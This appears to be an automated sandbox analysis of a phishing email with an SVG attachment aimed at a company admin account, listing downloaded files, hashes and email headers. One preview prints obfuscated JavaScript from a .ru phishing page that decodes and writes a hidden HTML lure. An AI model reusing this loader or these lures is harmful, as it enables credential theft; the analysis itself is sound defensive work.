                                                  Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (65368)
                                                  Category:downloaded
                                                  Size (bytes):192147
                                                  Entropy (8bit):4.675889043942739
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4011BEE054400593DCB6C5BAE06F5071
                                                  SHA1:051DDDA79F6331C57540A150B993549BAD7F05B1
                                                  SHA-256:8CC36BCC1520D18A83800F5A6C6D06D3BEB73F2DB5D7F1326F8DF3F7DDF2E8B1
                                                  SHA-512:848857F6DADAB01FF5A38C642E46CAFF109C7D00DB93B75724608289ADBBD4DB4B5374F1283EE5734696B13037F56510D5ED60C017A3C95A7D2A1B90B16CD710
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/
                                                  Preview:<script>.aHzRKvJjQF = atob("aHR0cHM6Ly96ci5rdnR3enMucnUvczIzUnVwLw==");.IpdjqtsSXc = atob("bm9tYXRjaA==");.upoEfIEaDn = atob("d3JpdGU=");.if(aHzRKvJjQF == IpdjqtsSXc){.document[upoEfIEaDn](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IEhOd2h4VW1OV2wgPSB7CiAgZ2V0KHdkR3RXZGxweHEsIG5aV0hNck1FblEpIHsKICAgIGNvbnN0IFdieUlqcGZlTk8gPSBbLi4ublpXSE1yTUVuUV0KICAgICAgLm1hcChJUWhNcGFUSk55ID0+ICsoJ+++oCcgPiBJUWhNcGFUSk55KSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgVFlSaEl1RWRPUiA9IFdieUlqcGZlTk8ucmVwbGFjZSgvLns4fS9nLCB4Q0ZGRE9HYVpuID0
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48238)
                                                  Category:downloaded
                                                  Size (bytes):48239
                                                  Entropy (8bit):5.343270713163753
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:184E29DE57C67BC329C650F294847C16
                                                  SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                  SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                  SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                  Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:very short file (no magic)
                                                  Category:downloaded
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://qnj64b.cuisbp.ru/loray$68hba2u
                                                  Preview:1
                                                  File type:RFC 822 mail, ASCII text, with CRLF line terminators
                                                  Entropy (8bit):6.062280662263334
                                                  TrID:
                                                  • E-Mail message (Var. 5) (54515/1) 100.00%
                                                  File name:Attached_image+from+ADMIN@weareworkspace.com.eml
                                                  File size:17'104 bytes
                                                  MD5:2d1af9462bcd19be477567f98b92c668
                                                  SHA1:9a8d1963e58b01428e7978ecf98cf7e2be09dfa5
                                                  SHA256:9bfbd17ee769100f624267016c853a93c194b10b418b12c17d4601da5b44148c
                                                  SHA512:76b92d7392eeafe3c197f478658a2abdd9a54fac55d25cea494df84532ead7392c52e46b2f5bb9de58567811d03094ea1eb5fb52471ce3d27ebe8c3fdeacdf51
                                                  SSDEEP:384:DR3BvS1t4t/tRKH9tzkuOc1oTfHPQ8dioBsrtdgy/9a+bMvGI:rutst29tzQG2vQ8Irtd/WvGI
                                                  TLSH:95725C057B536522EBB421417D742C8A128CBB55F4B651C47D1B667B02EB0BF7F38CA8
                                                  File Content Preview:Received: from LO0P265MB3083.GBRP265.PROD.OUTLOOK.COM (2603:10a6:600:184::14).. by LO6P265MB6016.GBRP265.PROD.OUTLOOK.COM with HTTPS; Tue, 18 Mar 2025.. 07:10:16 +0000..Received: from DUZPR01CA0192.eurprd01.prod.exchangelabs.com.. (2603:10a6:10:4b6::15) b
                                                  Subject:Attached/image from ADMIN@weareworkspace.com
                                                  From:ePrinter 0379008470 <info@servis.ai>
                                                  To:Admin <admin@weareworkspace.com>
                                                  Cc:
                                                  BCC:
                                                  Date:Tue, 18 Mar 2025 07:08:13 +0000
                                                  Communications:
                                                  • [EXTERNAL] Above for your perusal. ------------------------------------ This email has been scanned for spam & viruses. If you believe this email should have been stopped by our filters, click the following link to report it (https://portal-uk.mailanyone.net/index.html#/outer/reportspam?token=dXNlcj1hZG1pbkB3ZWFyZXdvcmtzcGFjZS5jb207dHM9MTc0MjI4MTc4Njt1dWlkPTY3RDkxQkUzNjRCOEYwMTQ5M0I2MzdBQjI3OUJEOTZBO3Rva2VuPTg5YjM4MmMxNWZmN2JjZWFiZDExNDU3NzBkZDVkMmE3MGZhYmY1MjQ7).
                                                  Attachments:
                                                  • 2758881647.svg
                                                  Key Value
                                                  Receivedfrom [10.95.0.11] (unknown) by geopod-ismtpd-3 (SG) with ESMTP id wrolQjgBRzqzrgS8hOPfCA for <admin@weareworkspace.com>; Tue, 18 Mar 2025 07:08:13.140 +0000 (UTC)
                                                  FromePrinter 0379008470 <info@servis.ai>
                                                  ToAdmin <admin@weareworkspace.com>
                                                  SubjectAttached/image from ADMIN@weareworkspace.com
                                                  Thread-TopicAttached/image from ADMIN@weareworkspace.com
                                                  Thread-IndexAQHbl9TM30WSVKZcrEu6jFSjCSTwpA==
                                                  DateTue, 18 Mar 2025 07:08:13 +0000
                                                  Message-ID<ORIGINAL-RELEASE-wrolQjgBRzqzrgS8hOPfCA@geopod-ismtpd-3>
                                                  Content-Languageen-GB
                                                  X-MS-Exchange-Organization-AuthSourceDB1PEPF000509FB.eurprd03.prod.outlook.com
                                                  X-MS-Has-Attachyes
                                                  X-MS-Exchange-Organization-Network-Message-Id2b7b9d65-75e4-4bd4-47ed-08dd65ebddf7
                                                  X-MS-TNEF-Correlator
                                                  X-MS-Exchange-Organization-RecordReviewCfmType0
                                                  received-spfpass (in6r.electric.net: domain of em9655.servis.ai designates 149.72.56.183 as permitted sender) client-ip=149.72.56.183; envelope-from=bounces+25952314-8aa1-admin=weareworkspace.com@em9655.servis.ai; helo=o1.ptr5164.freeagentsoftware.com;
                                                  x-ms-exchange-organization-originalclientipaddress192.162.217.18
                                                  x-ms-exchange-organization-originalserveripaddress10.167.242.37
                                                  x-ms-publictraffictypeEmail
                                                  x-ms-traffictypediagnosticDB1PEPF000509FB:EE_|LO0P265MB3083:EE_|LO6P265MB6016:EE_
                                                  x-ms-exchange-crosstenant-originalarrivaltime18 Mar 2025 07:09:46.9825 (UTC)
                                                  x-ms-exchange-crosstenant-fromentityheaderInternet
                                                  x-ms-exchange-crosstenant-iddaebecca-4bbe-4655-b317-ec2ee0c02541
                                                  x-ms-exchange-transport-crosstenantheadersstampedLO0P265MB3083
                                                  x-ms-exchange-transport-endtoendlatency00:00:29.0353606
                                                  x-ms-exchange-crosstenant-network-message-id2b7b9d65-75e4-4bd4-47ed-08dd65ebddf7
                                                  authentication-resultsspf=fail (sender IP is 192.162.217.18) smtp.mailfrom=em9655.servis.ai; dkim=fail (body hash did not verify) header.d=servis.ai;dmarc=fail action=oreject header.from=servis.ai;compauth=none reason=451
                                                  x-ms-office365-filtering-correlation-id2b7b9d65-75e4-4bd4-47ed-08dd65ebddf7
                                                  x-microsoft-antispamBCL:0;ARA:13230040|4143399015|29132699027|82310400026|9113399012|4053099003|43540500003;
                                                  x-eopattributedmessage0
                                                  x-forefront-antispam-reportCIP:192.162.217.18;CTRY:IE;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:smtp-in6.electric.net;PTR:smtp-in6.electric.net;CAT:NONE;SFS:(13230040)(4143399015)(29132699027)(82310400026)(9113399012)(4053099003)(43540500003);DIR:INB;
                                                  authentication-results-originalin6r.electric.net; iprev=pass (o1.ptr5164.freeagentsoftware.com) smtp.remote-ip=149.72.56.183; spf=pass smtp.mailfrom=em9655.servis.ai; dkim=pass header.d=servis.ai header.s=s1 header.a=rsa-sha256; dmarc=skipped
                                                  x-ms-exchange-processed-by-bccfoldering15.20.8534.029
                                                  x-ms-exchange-crosstenant-authsourceDB1PEPF000509FB.eurprd03.prod.outlook.com
                                                  x-ms-exchange-crosstenant-authasAnonymous
                                                  X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910005)(944506478)(944626604)(4710137)(4712020)(920097)(930097)(140003);
                                                  X-Microsoft-Antispam-Message-InfoqEPtZ3T4jH7RuSTTsWgco+WMwINhA/Q9GJM5Y/BKO47DMApPrMTILQ1WA4P3MOnvtK8XJCtjS7aRVXir94qIycah1tVUJUokQyCfAFH7eL5ASxBQJD8V1mu9oVD+QvWKXriuHdkFkprO2M1O9kNMaue4uobvLeAAy13KdAZW2MO8Q79XPOc8RIR04Js/zxk99I/ZLJmOfEM9vlS76BCW2slavx2J+PwCIh+Nj9zFJwpBguFnHzfaEN3JpKijDOKLIIrAEa2+pdrbD9RxdujjwK0cW4b50QxcdygJT3iq0rpIM/Vx2d91ylx13iLGCBTOKCojxBj2EPQxOAp4n0OePf1C9p/7M5G0JzMg+qhIzCkTa8qq0tX5AWI9hicgKAKj0cw94SZo94gW0wr9uHdtsJiQcMdwlZBL7EjgecHLAwEXqywpyzIHizcxIbNWW7bvk65ynybTDLjbTGk20soYN9JV4ZxW3N8FuQ8gT230gMw2JjEnmHUtoIcJGif+HFmNTa6FQPsVZqcD6eJHlf7Q/PaOllZVYYkYPsIFiuM81iSLdJBRfELQRQTiPrr7ojGFrnSfaqNskrfAgif7+KdIpn+y1gV6VpOkNxknp//e4x7zH+WnU5YDDBJs0WmH8b0J/qX4yOYL9SwRHHvORN/omVIrjqtww8H3sLBLMVtgcgqhYOsAE9Pp9UYpqopKFqhZf2RUA73mFp+KsCl4VAaW+s/N3Vg0OX+ziwgNnmh8n0qoejxI0q0638qDjXVCwyHYGCobdBqyrBP5Bz+zUl04rrkDub9Ek/W0UL2tR59kMQ/lTzRnHzyW4NF7hHaITmWh12hatmP+viOf/CvA4gwJ30OpbAhtM3sJn9VUe+cOZ3YJTcBA9EAqEGi2L8Zms36Du2PpbHvTqc3k/Jf2/Of7p0w+maFZ7fGpOr7QxVje4agsopjiWbWqMA2KK8Z1T9Pm78PlxosGLawhDOSO+xxKBawYqkGrN5aoT1YWXyiwmMv/S2qqW6tu9rxsvP/vomNmQWTjSulBS+AE/ONiG3lk/J3oq2OsMk7ESAmLWruUSS5h28AhPJbUce0kpiZ6UHQeo4aIN47CMZdVY2G6mkkQM1KOWHYuFHcc0ai0/tr+QtoK8+oHrygDvfsph5fXuiZiGr2OtIoYnc/TFv3g9VY3+4+6IJ6dWmJ9SDotQgOp5IhTJbO4FNBxhtEEHI3iFxyL/WhCxYyAYnUJUfbIHpp4/dT5l1I3c0ZdorV4boav2zSvrg5bw3vipO24XzLQz2tmcosuJAWbCDYfeI/5do01bZepp+L1CK1YYNtORwbDLKEohVL43LGSCMcovSHPazGFBmFW08X9Z+uFTNw1Dde/bg1mG5Usb3MRk2U0jVs5T0vJva3tuDJPzftjA8ZoBv9mtFNI65S/n4Ys4AqgPBApQkKttL/89ussUydy96d/kRUBCTH7Qi7wFJnWM7VluiXokvgTtbp7OA1+ATzLpJnE/JaZsy8pREZCG4KYlAPXE0Ohrt6pmAn+vsj79fGZcYjH5S77gmIeF60fUp0u+qSJ3Der7BwAug/ysRAXD9jUQFmvnDo7bs+akM2emttxpiUdFRBuHrmI7vB/IRkJYUhwPkIH8t4bN48H8C3HXmhD9trMiQnSd/AttJTmPPtr3j560TVfJxMV84CMn5bDdZocpZhV0GUWN5sZWbidb80oBzq45SRO3/YH7dijhBY5M+GQHXl5h3kLEY7tQjCy81FuAlKrapXOpsvIXCVSy8o+NA+DWNV4YSnKzE5ll0zNKKcPqSH5Y4jYNKEdIJrbdY/68EqeL9y/IoZx1PhEK3ss0L5NCiPaYKTBmhGG6tRBKwnAuk+KXpVadibyM6a4Kdj/9LdbUknn+5MChFjrL4HTBm9LFJnv+BldmN9iVFU90GMqA5LADcnq/tUKTEBv5o/J1eCpAALuay+NYS+DnGRXqo+1NlX4cqpbvGsj1izE4mz5hzy9Iq2cB9dIQ/rK55H0XtoqjSA/BD6IaQOaY5UQPCBW3RFzB2NPbT9sl288oyghnGV5wbziH+1nKLd65Bwg4dd9ejdvRd87oudczMdmuYjetGxqRv8WGbl85QZY8isRYOU30jND0oK+p2fqps8vWSKvTCTj0LmtXx6egXyX7oWNo7N8Tgvdbvtg42DvOAMawQNNM4fAH/fXaqSYzDYz9+F0EiogawwKmEZfmAueOsfvf+ulN2vbYkMwlwvVSGoOwUvkmoEtWrgtrsJE+i0wjnNc8VJ8/i00qGok+W7Tfo+or34yC3R95ZO7NbbveqAzUuNIXpWvbWHnC/p0lkBpRHbVAV/NajUMdstUArhy5TiMhOD1NEUQ7l8KAfpbXW7dVli9nBurwS+cCLJxNm4TEzVcwRwFVujtp0VeYclrnA4jtNf88dKU47DVH9r/e19UT/cJyZL+YEJ15qkXMVg8L/VVznQgn+iW3T2b1D++BSi7gbVeibN7lEW2i7Ymuk1kFhBZ1bApYgIRPPpODvsOuF7LAM/KssbaLGweBVQ/j/MJrsy8IqJ4WHPJKp0hBjAGt0y5frfuQXTjPkLA+QWGf1L1OngTfajgYH04C6xzKO70gK7BGKPfQ8b8TUdHQOX1Jid+qK3vydC2x+GECPPNAtIj8qUs7ChoOTYkB8P+i7B7x+XQQfiI8LjRYrXHef5esFLK0dJkiyUJiV/dWf1eyz9VhwtBi3s+vDZeN1iI7m9knPwzCpwl4oWNbYWcWW1Z6O3YAJ+RC9I0vHgA9Vpln9tBpAjRzlxV75SEphbNsCJ9zZs199vhkXKF35JfjkBgJjzldy5PaWWyIkHI2FY3ZeBMvYjPu27nBmYtzx9bNojh+j/kFe6bkly+neE9e9uUEbCt1E1tHxtKpbv/Z0eAW3DLFfjMPOuEsyx9x5jP8spWXj4LJ5A2vP9Zznf5mEkfqNUJdKwK0Fm7wXA6UhQK60fe6UjZtBFbFlwvv/9QANiU7qXxQY5mA24Qv0g4xbkl
                                                  Content-Typemultipart/mixed; boundary="_002_ORIGINALRELEASEwrolQjgBRzqzrgS8hOPfCAgeopodismtpd3_"
                                                  MIME-Version1.0

                                                  Icon Hash:46070c0a8e0c67d6